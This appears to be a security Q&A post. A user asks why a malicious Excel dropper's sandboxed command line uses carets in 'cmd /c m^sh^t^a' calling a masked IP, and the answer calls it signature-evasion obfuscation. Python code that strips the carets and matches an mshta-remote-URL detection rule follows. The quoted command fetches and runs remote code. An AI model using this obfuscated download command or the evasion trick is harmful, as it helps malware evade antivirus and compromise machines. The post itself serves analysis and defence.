I found a malicious Excel file that was using an embedded HTA program as its dropper to download a PowerShell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the ^ character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html 

Then the following command was:

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html 

So, it was using HTA to call mshta.exe, but why that syntax in the command line? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

1 Answer

That is likely an attempt to evade security software and/or signature-based detection. The caret character (^) is used as an escape character in batch scripts/cmd. When used before a normal character, it is effectively just ignored. This is a common obfuscation technique used by Windows malware.

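A defender-side de-obfuscation step for the behaviour the answer describes, added here as an example (it is not code from the question or the answer): it applies cmd.exe's caret rules to a command line before matching it against a detection rule, so that m^sh^t^a and mshta are seen as the same thing. The masked command line from the question is reused as constructed sample input; the mshta-plus-URL pattern is an assumed, illustrative rule.

```python
import re

def decaret(cmdline: str) -> str:
    """Strip cmd.exe caret escapes the way the command interpreter does.

    Outside double quotes a caret escapes the next character, so '^x' -> 'x'
    and '^^' -> '^'. Inside double quotes a caret is an ordinary character.
    A trailing caret with nothing after it is dropped.
    """
    out = []
    in_quotes = False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes  # quotes toggle caret handling off/on
            out.append(ch)
        elif ch == "^" and not in_quotes:
            i += 1                     # keep the escaped char, drop the caret
            if i < len(cmdline):
                out.append(cmdline[i])
        else:
            out.append(ch)
        i += 1
    return "".join(out)

# Assumed detection rule: mshta launched with a remote http(s) URL.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE)

def inspect(cmdline: str) -> dict:
    """Normalise a command line, then report caret usage and rule hits."""
    norm = decaret(cmdline)
    return {
        "normalized": norm,
        # carets that were escapes (not the literal '^' left by '^^')
        "carets_stripped": cmdline.count("^") - norm.count("^"),
        "mshta_remote": bool(MSHTA_REMOTE.search(norm)),
    }

if __name__ == "__main__":
    # Constructed sample: the masked command line from the question.
    sample = r"cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html"
    print(inspect(sample))
```

Matching the raw string would miss the obfuscated form, while the caret count itself is a useful secondary signal: legitimate command lines rarely carry seven escapes in two tokens.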